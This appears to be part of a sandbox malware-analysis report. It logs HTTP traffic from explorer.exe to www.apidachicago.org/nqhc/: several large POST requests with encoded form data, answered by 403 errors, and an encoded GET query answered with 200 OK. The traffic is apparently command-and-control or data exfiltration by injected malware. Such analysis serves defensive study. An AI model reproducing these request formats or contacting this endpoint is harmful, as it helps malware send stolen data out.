                                                                                                                                                                          Data Ascii: 7nWHV=394x0pdxA_61egTG0MEDACCvsMzf6nRsIJkxz8fGxMoDq9ceoOfdcgTwzhp5BF1kCUjc0lpDHMQLyh9q92S1JMYbDr(gPl1gd_VzJ4MQmqikz3oD6i7Nob6Tb-op6SRZltuxGWRzxoyilOZlt7wgP-dJ7RIRFEJjQ0gRL6O-sIZ29_mF~w).
                                                                                                                                                                          Dec 5, 2022 15:16:55.422645092 CET11648INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:55 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Dec 5, 2022 15:16:55.422729969 CET11648INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                                                                                                                          Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                          Dec 5, 2022 15:16:55.422780037 CET11648INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          36192.168.11.2049877194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:57.444516897 CET11650OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.apidachicago.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.apidachicago.org
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.apidachicago.org/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 33 39 34 78 30 70 64 78 41 5f 36 31 64 41 6a 47 34 4e 45 44 42 69 43 6f 70 4d 7a 66 31 48 52 53 49 4a 59 78 7a 34 48 57 6b 75 38 44 72 63 73 65 70 4d 33 64 52 41 54 77 38 42 70 38 4d 6c 31 56 43 55 76 2d 30 67 52 44 48 4d 55 4c 67 44 31 71 74 57 53 71 64 38 59 61 55 62 28 68 4c 6c 31 71 64 5f 49 53 4a 34 6f 51 6d 37 4f 6b 79 30 41 44 72 44 36 62 7e 4c 36 76 64 2d 6f 71 73 69 52 58 6c 74 53 54 47 55 41 4d 77 61 75 69 6c 75 35 6c 28 4c 77 6a 56 2d 64 4f 6d 68 4a 43 4f 56 49 36 66 69 55 74 4c 6f 47 38 6b 70 78 67 77 4d 37 62 38 78 50 6e 51 6f 7e 52 6d 79 74 73 6c 54 71 37 39 5f 6f 42 41 32 4b 36 66 44 56 38 48 65 6d 64 34 45 74 72 7a 4b 37 72 30 62 74 4f 7a 43 35 59 61 43 4b 52 46 30 45 4c 67 73 36 7a 45 30 64 53 70 58 6b 33 67 44 6e 6d 74 43 4c 41 4e 5f 31 6b 46 53 77 6d 42 49 4e 65 71 38 47 6b 77 62 39 45 73 75 79 61 4c 7a 49 57 61 34 68 79 58 63 61 2d 39 5f 65 57 71 33 58 71 6f 4b 4a 4b 38 75 72 73 70 6c 32 72 74 2d 50 4c 42 54 53 6d 44 4b 34 33 52 30 77 4b 37 52 38 75 4a 67 79 41 48 4f 70 56 4e 5f 6e 77 6d 6f 50 50 79 41 45 64 72 79 62 5f 28 66 37 73 61 69 6a 6a 4c 45 50 4a 7e 57 61 65 58 75 46 73 41 50 35 52 46 68 53 39 33 5f 58 37 50 72 72 49 61 53 35 50 79 5a 48 4e 38 7a 45 43 70 38 38 36 53 37 41 37 5a 6a 43 5a 61 32 59 4a 46 61 5a 36 51 36 7e 31 66 32 66 59 7a 35 64 6d 35 4d 39 45 44 65 7a 66 37 72 71 4a 6f 41 78 69 50 58 67 4e 63 61 55 76 7a 48 32 52 7a 77 58 57 63 52 6e 53 6b 62 53 7a 36 5f 56 74 57 39 7e 56 6b 7a 35 49 46 48 74 4f 70 37 55 36 4f 44 5a 66 4e 46 64 33 37 5f 6e 67 38 49 62 45 31 42 30 4a 43 62 37 48 6b 32 45 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=394x0pdxA_61dAjG4NEDBiCopMzf1HRSIJYxz4HWku8DrcsepM3dRATw8Bp8Ml1VCUv-0gRDHMULgD1qtWSqd8YaUb(hLl1qd_ISJ4oQm7Oky0ADrD6b~L6vd-oqsiRXltSTGUAMwauilu5l(LwjV-dOmhJCOVI6fiUtLoG8kpxgwM7b8xPnQo~RmytslTq79_oBA2K6fDV8Hemd4EtrzK7r0btOzC5YaCKRF0ELgs6zE0dSpXk3gDnmtCLAN_1kFSwmBINeq8Gkwb9EsuyaLzIWa4hyXca-9_eWq3XqoKJK8urspl2rt-PLBTSmDK43R0wK7R8uJgyAHOpVN_nwmoPPyAEdryb_(f7saijjLEPJ~WaeXuFsAP5RFhS93_X7PrrIaS5PyZHN8zECp886S7A7ZjCZa2YJFaZ6Q6~1f2fYz5dm5M9EDezf7rqJoAxiPXgNcaUvzH2RzwXWcRnSkbSz6_VtW9~Vkz5IFHtOp7U6ODZfNFd37_ng8IbE1B0JCb7Hk2E.
                                                                                                                                                                          Dec 5, 2022 15:16:57.463150024 CET11650INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:57 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Dec 5, 2022 15:16:57.463247061 CET11650INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                                                                                                                          Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                          Dec 5, 2022 15:16:57.463304043 CET11650INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          37192.168.11.2049878194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:59.491189957 CET11653OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.apidachicago.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.apidachicago.org
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.apidachicago.org/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 33 39 34 78 30 70 64 78 41 5f 36 31 64 41 6a 47 34 4e 45 44 42 69 43 6f 70 4d 7a 66 31 48 52 53 49 4a 59 78 7a 34 48 57 6b 76 45 44 71 75 30 65 6f 71 28 64 51 41 54 77 78 68 70 39 4d 6c 31 79 43 56 48 36 30 67 55 2d 48 4f 63 4c 67 51 68 71 74 45 71 71 4e 4d 59 5a 59 37 28 76 50 6c 30 78 64 5f 55 47 4a 37 55 41 6d 71 36 6b 7a 32 59 44 36 41 6a 4e 77 37 36 54 64 2d 6f 6d 6e 43 52 6c 6c 74 58 65 47 55 4d 4d 77 59 71 69 6b 64 42 6c 73 4d 6b 6a 42 65 64 4e 73 42 4a 64 55 6c 49 35 66 6a 30 35 4c 6f 48 44 6b 71 39 67 77 4c 50 62 75 6d 6a 6b 52 49 7e 52 34 69 74 76 7a 54 58 38 39 5f 63 5a 41 33 7e 36 66 41 56 38 45 2d 6d 64 70 56 74 71 33 71 37 68 77 62 74 6a 33 43 31 41 61 43 32 46 46 77 55 4c 67 34 71 7a 46 46 64 53 36 47 6b 33 74 44 6e 6b 7a 43 4b 45 48 66 31 6f 46 53 67 4c 42 4d 78 4f 71 37 7e 6b 69 76 70 45 71 4c 47 56 4d 54 49 55 66 34 67 36 54 63 65 69 39 2d 75 4b 71 33 58 41 6f 4c 4e 4b 38 65 62 73 6f 6b 32 6b 75 75 50 4d 4a 7a 54 79 4d 71 30 74 52 30 74 48 37 51 45 2d 4a 68 32 41 48 75 70 56 62 4d 28 33 78 6f 50 32 74 51 45 4c 6c 53 62 6f 28 66 32 4e 61 6e 53 65 4c 33 37 4a 34 6d 4b 65 51 2d 45 36 45 76 35 56 65 52 53 42 6d 76 58 37 50 72 6e 36 61 53 6c 50 79 6f 76 4e 39 45 67 43 76 74 38 36 42 72 41 39 5a 6a 43 49 61 7a 42 33 46 61 52 6c 51 36 75 62 66 77 76 59 7a 6f 4e 6d 36 4e 39 44 54 2d 7a 65 28 72 71 65 32 77 39 31 50 58 38 46 63 61 45 5f 77 33 4b 52 31 45 37 57 59 52 6e 52 69 37 53 34 39 5f 56 37 48 74 7a 4b 6b 33 52 79 46 45 78 65 70 38 41 36 4f 48 6f 4c 56 55 4d 67 6e 50 37 4f 79 59 50 33 32 58 6b 4a 47 5a 50 35 34 54 30 57 64 47 70 41 28 73 31 52 76 71 38 36 47 5f 31 69 74 79 6a 30 58 45 52 7a 64 4a 41 55 6a 63 71 79 79 4c 69 41 5a 70 68 61 69 42 41 41 37 76 71 71 44 64 48 43 4b 4a 4b 58 4e 37 6e 32 4c 6c 55 42 42 45 54 50 63 67 61 31 51 32 36 57 56 6f 7a 53 64 38 57 76 6e 64 5a 54 70 4e 6b 62 69 61 4a 4a 57 77 48 72 53 4a 62 73 43 74 37 4d 6a 38 34 79 42 63 53 6f 68 34 37 33 41 48 50 54 4e 38 72 78 59 42 66 31 56 6c 5a 79 68 4e 72 6a 59 56 59 5a 41 6e 7e 38 72 54 31 45 75 67 54 6f 53 67 76 58 73 5f 42 53 6f 74 68 48 4e 41 4d 76 47 68 58 39 6e 33 59 72 58 30 65 67 45 58 4a 6b 75 5f 4c 6d 39 73 6b 56 6f 73 61 72 4f 6e 77 36 44 52 79 77 78 78 70 59 46 50 61 44 38 67 34 52 6d 33 6b 39 58 53 59 39 55 5a 42 6b 6a 34 68 43 6f 73 51 76 6e 47 44 77 4c 70 42 4b 72 5f 49 31 28 67 65 4e 6e 7a 31 32 30 45 52 68 77 46 44 49 74 46 65 71 33 6c 31 43 33 50 45 53 78 61 31 6e 34 68 76 72 74 4a 32 37 6d 64 53 4f 6f 62 62 38 39 4f 59 75 31 46 6c 33 39 6f 44 4d 54 33 41 65 28 64 54 68 48 66 52 70 6e 30 47 37 53 63 4b 74 32 46 36 79 58 62 64 58 45 64 42 6b 28 32 30 35 7e 6e 65 64 6c 50 6c 61 5a 4f 4f 6b 54 62 28 51 39 4d 51 4b 63 4a 58 78 39 57 64 4c 53 47 38 69 37 2d 4a 4c 30 70 42 41 6a 6a 73 67 70 32 66 7a 67 4c 67 73 58 32 64 7a 62 78 44 37 33 62 53 37 77 6b 4d 6d 47 31 59 66 75 38 73 57 33 61 7a 71 32 49 4e 59 4d 64 4c 35 4b 41 34 65 6c 57 49 69 6e 57 32 30 78 67 51 66 39 4d 69 38 33 79 56 5f 7e 2d 63 71 43 43 78 46 48 74 4d 36 41 6d 71 50 6c 48 4f 39 63 5a 34 4f 6f 4e 7e 6b 64 54 42 4e 7a 74 35 79 4c 6e 6a 71 77 51 6b 56 52 73 69 54 42 45 47 45 68 6e 44 4e 58 4e 31 66 70 33 54 70 6f 73 78 53 74 56 31 65 34 32 52 31 5a 55 55 70 32 50 28 44 35 70 4d 66 5a 41 63 46 68 36 44 6e 71 33 48 4a 35 48 38 33 47 32 77 54 51 6b 7e 48 72 76 4b 52 44 31 55 30 36 68 75 76 77 6c 7e 57 63 78 64 79 33 49 50 5a 7e 44 52 48 75 55 49 75 6b 38 32 38 4b 31 65 69 44 75 58 56 70 33 53 6c 4a 45 4f 31 39 35 6a 77 65 6b 6c 47 4f 44 74 66 48 6e 7a 34 44 56 30 67 44 6c 52 32 51 42 6a 57 56 4d 5a 67 47 7a 76 44 53 55 43 4e 33 39 4e 33 51 4a 53 78 64 43 74 45 5a 75 39 4d 61 47 42 57 70 54 4e 50 45 50 61 34 63 59 59 57 48 32 6a 32 72 41 69 66 4f 4d 55 32 71 65 7a 67 4d 73 72 73 53 6d 74 48 7e 34 4c 68 6e 33 43 42 57 36 70 72 32 53 48 4e 53 4d 44 78 56 33 56 51 43 35 4c 6b 45 6f 51 45 4f 50 65 56 66 51 6b 39 65 35 65 54 41 70 54 65 44 39 38 6d 33 38 30 44 47 5f 4c 37 37 6f 36 77 4e 74 6c 54 79 38 6a 44 72 77 32 6f 70 5a 6a 50 4a 32 39 67 52 57 46 43 30 55 45 64 67 48 67 5f 7a 79 63 5f 65 39 59 74 68 72 4e 56 61 37 28 55 59 75 61 6d 58
                                                                                                                                                                          Data Ascii: 7nWHV=394x0pdxA_61dAjG4NEDBiCopMzf1HRSIJYxz4HWkvEDqu0eoq(dQATwxhp9Ml1yCVH60gU-HOcLgQhqtEqqNMYZY7(vPl0xd_UGJ7UAmq6kz2YD6AjNw76Td-omnCRlltXeGUMMwYqikdBlsMkjBedNsBJdUlI5fj05LoHDkq9gwLPbumjkRI~R4itvzTX89_cZA3~6fAV8E-mdpVtq3q7hwbtj3C1AaC2FFwULg4qzFFdS6Gk3tDnkzCKEHf1oFSgLBMxOq7~kivpEqLGVMTIUf4g6Tcei9-uKq3XAoLNK8ebsok2kuuPMJzTyMq0tR0tH7QE-Jh2AHupVbM(3xoP2tQELlSbo(f2NanSeL37J4mKeQ-E6Ev5VeRSBmvX7Prn6aSlPyovN9EgCvt86BrA9ZjCIazB3FaRlQ6ubfwvYzoNm6N9DT-ze(rqe2w91PX8FcaE_w3KR1E7WYRnRi7S49_V7HtzKk3RyFExep8A6OHoLVUMgnP7OyYP32XkJGZP54T0WdGpA(s1Rvq86G_1ityj0XERzdJAUjcqyyLiAZphaiBAA7vqqDdHCKJKXN7n2LlUBBETPcga1Q26WVozSd8WvndZTpNkbiaJJWwHrSJbsCt7Mj84yBcSoh473AHPTN8rxYBf1VlZyhNrjYVYZAn~8rT1EugToSgvXs_BSothHNAMvGhX9n3YrX0egEXJku_Lm9skVosarOnw6DRywxxpYFPaD8g4Rm3k9XSY9UZBkj4hCosQvnGDwLpBKr_I1(geNnz120ERhwFDItFeq3l1C3PESxa1n4hvrtJ27mdSOobb89OYu1Fl39oDMT3Ae(dThHfRpn0G7ScKt2F6yXbdXEdBk(205~nedlPlaZOOkTb(Q9MQKcJXx9WdLSG8i7-JL0pBAjjsgp2fzgLgsX2dzbxD73bS7wkMmG1Yfu8sW3azq2INYMdL5KA4elWIinW20xgQf9Mi83yV_~-cqCCxFHtM6AmqPlHO9cZ4OoN~kdTBNzt5yLnjqwQkVRsiTBEGEhnDNXN1fp3TposxStV1e42R1ZUUp2P(D5pMfZAcFh6Dnq3HJ5H83G2wTQk~HrvKRD1U06huvwl~Wcxdy3IPZ~DRHuUIuk828K1eiDuXVp3SlJEO195jweklGODtfHnz4DV0gDlR2QBjWVMZgGzvDSUCN39N3QJSxdCtEZu9MaGBWpTNPEPa4cYYWH2j2rAifOMU2qezgMsrsSmtH~4Lhn3CBW6pr2SHNSMDxV3VQC5LkEoQEOPeVfQk9e5eTApTeD98m380DG_L77o6wNtlTy8jDrw2opZjPJ29gRWFC0UEdgHg_zyc_e9YthrNVa7(UYuamXPNAEQNrp0LZLjzqhk4edvZkY9AROUdXRfAqCiF7hKmGjLPKT2akT64cBzI3yT~l87fMlGKM8Fscf8lPh0ih4JvGMs4PueBQQcF5PNDjXgjsnBgsmBbR6YdzBXdhIc2JN3252OWKdEOP2dwT7UOiuLIT2l6Czln1QGE8qDR1EkaHZ0RSVlSlk9IA3c4XBtVH(m5ZhJUYKzCGjn2Zx2DseBsBJGFq(McaInz1sE2Op0CG(5j8S8Dc7qiq2ErgbI59wXxs(MANRe3o2wJsFyB1KifVSVLX0DeZ0_b8DLtm(DovUZmxWi7a4idHJxTWSkT-dAwHmRbNNJeu4xoM3bqERalQNawn5Rj3kBDqqROnCzfAubWsvpJETxOJZS6x9_ATvIBS~NZSZkxg3_d-QFeaiF8vmeYc9AAgdqHxTZ8A9QF5kS4kOe1Jsl8xelmTXiHC7RApZUxhIOQpm4KAEPhBOp7MIKmZlqhU0BsUVwEkFdaA50khYQ(Bk9BqQNv_BByw10F-ycykW5LOBwxt5iBB6hmPsNGWhDIXRxNqgPsIHFR0fnzYckRqy6uQ155Zlgfq8ZFG4eJ_IZtMcvABj3c_ZgMPYLr_z3qisdR9SbBNXpPb1DYzd3WQg0aSTnHqvNys(Hp6w7cKYEftgTlMUyrqI5b2XKF6H8nBeBfshFI9u692rIqHCEqMKTuBzAQvpWOACf~p8iHCFuT9xf(aIKpHfDhkB1WKEB6SzuMlX1I8dDDblh4e1Bdx2NfADeZmqqNVOju0qfMHC-IbPnK2R1xYfnBl~ECNFN5HQyLB
                                                                                                                                                                          Dec 5, 2022 15:16:59.491230011 CET11660OUTData Raw: 48 54 58 56 35 44 63 62 67 64 6a 58 66 53 31 62 48 46 6e 67 46 5f 72 35 43 31 49 4c 68 7a 55 6e 53 6d 6b 46 7e 52 4f 76 50 4f 34 43 36 71 34 4b 6c 4b 4c 33 51 35 6c 69 37 45 54 5f 34 38 65 31 31 46 63 76 62 70 7e 4f 4e 50 64 52 39 2d 33 4f 30 48
                                                                                                                                                                          Data Ascii: HTXV5DcbgdjXfS1bHFngF_r5C1ILhzUnSmkF~ROvPO4C6q4KlKL3Q5li7ET_48e11Fcvbp~ONPdR9-3O0HkAT4r5E30ARB7nMoSRB1KUDX4PH7Ub5KmwHf31yQoMNef74mAH3T7HfSGnK_LQle6u1Cr8ubqT5wA5mXRZzzlrK1PTyogfaB5B2Ugcf8laa8TGIY9k9yoj1SkIcGUzl5PtqcNGDmkUE2bgWa~v8YG3UxeS8JmPvFy
                                                                                                                                                                          Dec 5, 2022 15:16:59.491296053 CET11663OUTData Raw: 72 58 37 76 51 34 36 49 45 51 57 5a 48 33 54 54 4c 4f 6c 64 37 45 75 4e 5a 30 7a 38 67 42 74 6d 38 4a 76 6c 4b 46 47 66 7a 68 78 35 75 77 38 71 55 62 58 4f 36 4f 32 6f 7a 55 45 44 47 6a 64 4a 7a 54 62 48 4b 58 71 61 66 58 71 4f 6f 64 5a 76 36 4b
                                                                                                                                                                          Data Ascii: rX7vQ46IEQWZH3TTLOld7EuNZ0z8gBtm8JvlKFGfzhx5uw8qUbXO6O2ozUEDGjdJzTbHKXqafXqOodZv6KBwMnf4fGfBCHqRUzb7XIFyAoH0cDFKTcL5BI3XPWIFdVMLXHclqFz7LGVEmAJAjifjYIwR8ke0saS_gbbmmgz7uBfel31nUbDvZ3ok6wl1VjZ5OksANyp5rbUK59NzJA5KzkqVosWQkVZ-sPKcuTqnAx4VhAbf1cl
                                                                                                                                                                          Dec 5, 2022 15:16:59.509062052 CET11666OUTData Raw: 53 61 75 59 7e 61 67 49 6a 52 41 46 6f 79 76 53 6b 44 6a 76 43 61 37 59 65 6e 4b 71 32 67 4a 61 64 46 46 66 7e 38 35 67 39 6c 77 42 4c 35 53 4e 38 36 39 41 43 44 51 38 57 31 6a 6f 72 37 35 75 63 44 44 61 59 6f 66 7a 50 6b 38 59 61 52 6a 6c 70 68
                                                                                                                                                                          Data Ascii: SauY~agIjRAFoyvSkDjvCa7YenKq2gJadFFf~85g9lwBL5SN869ACDQ8W1jor75ucDDaYofzPk8YaRjlphJvE1rNf1JszRS016(QtuxqIGeh(iPxfypLMNraG00Ig8kxLaC_lcx6kVwywCHzkldLpBXGhMU7zSGwnHp0godC1CKrXuDArV4jHQckfCYFtEDFjzBtJ13RhpeNYd(be0frw5Y8oJF2NRMu5JWjdlIKRY84R6wp0Nw
                                                                                                                                                                          Dec 5, 2022 15:16:59.509094000 CET11671OUTData Raw: 6d 4c 61 46 65 45 55 78 44 49 41 62 43 32 58 43 49 6d 35 57 4b 51 70 59 5a 4d 30 6f 47 6b 67 53 63 50 4c 48 73 33 79 6b 42 47 4f 5f 6d 67 74 55 41 4b 64 51 74 5a 71 33 62 70 33 59 56 4b 36 6e 51 77 76 44 66 4d 6a 33 4a 67 47 30 4b 55 63 6f 54 67
                                                                                                                                                                          Data Ascii: mLaFeEUxDIAbC2XCIm5WKQpYZM0oGkgScPLHs3ykBGO_mgtUAKdQtZq3bp3YVK6nQwvDfMj3JgG0KUcoTgx1371nVBNwx2Lg89CzSQI7wj(qxnRHrh~tLYZv28MVwgXtUMzOnZZNdiGbxRee9fVaa5bCdNq8MIWd4BM6M6KyttOl8nI6yAw3GnGA1163fB6iLOHNlKhqLNVxU4XznidyYYrWPpztytVcShnS7zP5jECdvmUIbGV
                                                                                                                                                                          Dec 5, 2022 15:16:59.509335995 CET11674OUTData Raw: 30 68 50 72 55 58 50 6b 7a 41 35 7a 42 48 4b 4e 59 5f 37 6d 4e 63 64 52 42 75 47 35 62 30 4b 64 34 52 58 6f 58 4b 6e 74 46 39 32 61 6a 6e 41 36 54 64 35 75 41 47 61 45 32 74 4c 36 5a 32 78 5a 55 45 62 7a 7e 68 55 56 6f 64 66 48 42 68 59 2d 66 53
                                                                                                                                                                          Data Ascii: 0hPrUXPkzA5zBHKNY_7mNcdRBuG5b0Kd4RXoXKntF92ajnA6Td5uAGaE2tL6Z2xZUEbz~hUVodfHBhY-fSSmzdDS2Qh6jQLHCFbL9oj-vp9KHeyMOVa7QUyorBaP52Gj~6MPO-OTKPXuzxFDpukWBmLylcNtLIb3a1jFVUy183bCzJjV1lYiPBO78ckBVYFVBmKM38yzAys4CtOFqafk7lcXFFTSxkIO9_THgf6427bHQ0ul6A2
                                                                                                                                                                          Dec 5, 2022 15:16:59.509502888 CET11680OUTData Raw: 43 30 69 61 41 78 6d 2d 6b 5f 78 63 4b 51 45 31 7e 36 6a 72 58 34 48 39 77 31 63 48 44 47 71 6f 6e 51 6a 79 5a 6a 51 45 54 61 4c 32 33 66 49 44 53 68 31 6c 73 46 77 75 67 6c 42 53 79 33 48 4f 75 6f 53 41 32 68 4e 64 76 64 44 72 7e 5f 6c 76 6c 5f
                                                                                                                                                                          Data Ascii: C0iaAxm-k_xcKQE1~6jrX4H9w1cHDGqonQjyZjQETaL23fIDSh1lsFwuglBSy3HOuoSA2hNdvdDr~_lvl_Q1oALZ1Yja4lVOjZfC(RnvNy07u28Xh1IO4k~_D_9cgk7zjqGGA-OuQ2COTUvBzrEeysyUjHrhKgSLHmP64qQ65Zjrst62Kg44(JLUt0zxrFisABOhC97LCfH5h_4eh5LaCG3CRAKkQlYjb3bnLcJfJLTGNTB6w2J
                                                                                                                                                                          Dec 5, 2022 15:16:59.509654045 CET11689OUTData Raw: 33 4b 4f 38 43 6f 37 43 62 6f 34 43 4d 6a 67 5a 59 34 54 4d 51 74 5a 31 4f 79 61 72 51 4b 7e 79 54 68 6a 4d 39 45 64 45 34 32 68 75 36 31 41 75 71 57 71 64 4a 71 65 32 64 61 6d 77 28 4c 32 65 4a 6c 6c 42 62 6c 4a 64 67 66 33 66 71 37 35 58 34 46
                                                                                                                                                                          Data Ascii: 3KO8Co7Cbo4CMjgZY4TMQtZ1OyarQK~yThjM9EdE42hu61AuqWqdJqe2damw(L2eJllBblJdgf3fq75X4FHkR1TWrm5WsQ10jlR9sEDZRhEUM5Jnb1DMLUhaWwBYqkf32U(3rJzqSz8l(np4BIIdrdknX2c8NO7KE1e4i32s7rJgUxv1EW36bPf8U_TVX_49lbEqV0j-zDyvcXaRFaXPa_HiX06_sLvRqqhvLYdZtj5v2OPsB1Z
                                                                                                                                                                          Dec 5, 2022 15:16:59.527086020 CET11690OUTData Raw: 75 31 35 50 4a 76 34 69 63 30 5a 33 75 68 47 5a 50 58 50 5a 58 57 67 57 59 72 38 66 6f 62 46 75 71 43 56 66 4d 75 62 45 6d 33 43 65 79 4b 5a 41 32 6d 38 64 56 44 58 43 58 70 42 63 4c 4f 31 76 6c 72 37 54 54 36 28 52 46 5a 4a 56 68 34 4c 31 73 38
                                                                                                                                                                          Data Ascii: u15PJv4ic0Z3uhGZPXPZXWgWYr8fobFuqCVfMubEm3CeyKZA2m8dVDXCXpBcLO1vlr7TT6(RFZJVh4L1s815l4nSHHWcow5R6xzhaS2dhS7eX0Yu3gGcM5szy1AfWf8Vcus4dObAOEc6GRDEwQJjIkn3ow7-3hHI38lWVF0C2kYoezJYW_VFhCeiwL~amGg5457mWD0F1pHT9o6bVfWtoC~pDeYFg4pqBtyXFP1tn6lHvRzeqER
                                                                                                                                                                          Dec 5, 2022 15:16:59.527133942 CET11696OUTData Raw: 4b 6f 66 48 36 42 47 47 62 38 47 44 37 36 5a 55 54 7a 69 51 46 73 46 68 69 74 39 42 66 54 54 58 47 59 48 5f 63 78 6b 58 45 6c 64 4c 71 58 71 4c 51 62 61 58 46 4c 33 46 4d 67 75 4e 44 6b 36 37 4f 30 59 6f 70 65 35 4a 64 36 34 76 75 62 62 51 59 4a
                                                                                                                                                                          Data Ascii: KofH6BGGb8GD76ZUTziQFsFhit9BfTTXGYH_cxkXEldLqXqLQbaXFL3FMguNDk67O0Yope5Jd64vubbQYJJjGZfiTwi3TeY-jm8PCdxE19aRNfjkhTDRWDca5gHX0bXoJy1SVdFnsgD4k5OIiV(S9xVMKLBUBwx3ePBVD3OdRfxJUcjXvvR9XK9gUw0xjt9MzvZJZzgqM-WDd-diLd53dlATb37Kz07IT2tz(OizkiyDLDxIzYi
                                                                                                                                                                          Dec 5, 2022 15:16:59.527184963 CET11702OUTData Raw: 7e 54 71 71 55 46 77 64 54 7a 52 35 50 43 6e 5f 48 47 4d 74 69 34 79 53 45 47 33 46 36 62 55 6c 48 53 79 47 6c 69 5a 65 56 72 49 4b 78 62 70 52 4d 38 44 54 71 64 75 63 42 43 64 5f 44 51 66 48 31 46 65 68 79 36 35 36 6d 31 6b 74 72 35 6d 46 28 6c
                                                                                                                                                                          Data Ascii: ~TqqUFwdTzR5PCn_HGMti4ySEG3F6bUlHSyGliZeVrIKxbpRM8DTqducBCd_DQfH1Fehy656m1ktr5mF(lD9prFu(Ta1RglIYtqKPxA_zfSOGIExjsuio5Hlr4P-vmEm4FvYJx551mCw(AU5XlZNm3thlsnEDV9K91mPrnAeis06GDdI8oR_3TRg5wOcf5OtZmXiuuYgknqdhzzsCJ(YPP(hWAaL~EHOW6Vn(ttBNx0ARNlzs9p
                                                                                                                                                                          Dec 5, 2022 15:16:59.545398951 CET11703INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:59 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Dec 5, 2022 15:16:59.545420885 CET11703INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                                                                                                                          Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                          Dec 5, 2022 15:16:59.545562983 CET11704INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          38192.168.11.2049879194.245.148.18980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:01.537708044 CET11704OUTGET /nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.apidachicago.org
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:17:01.556195974 CET11705INHTTP/1.1 200 OK
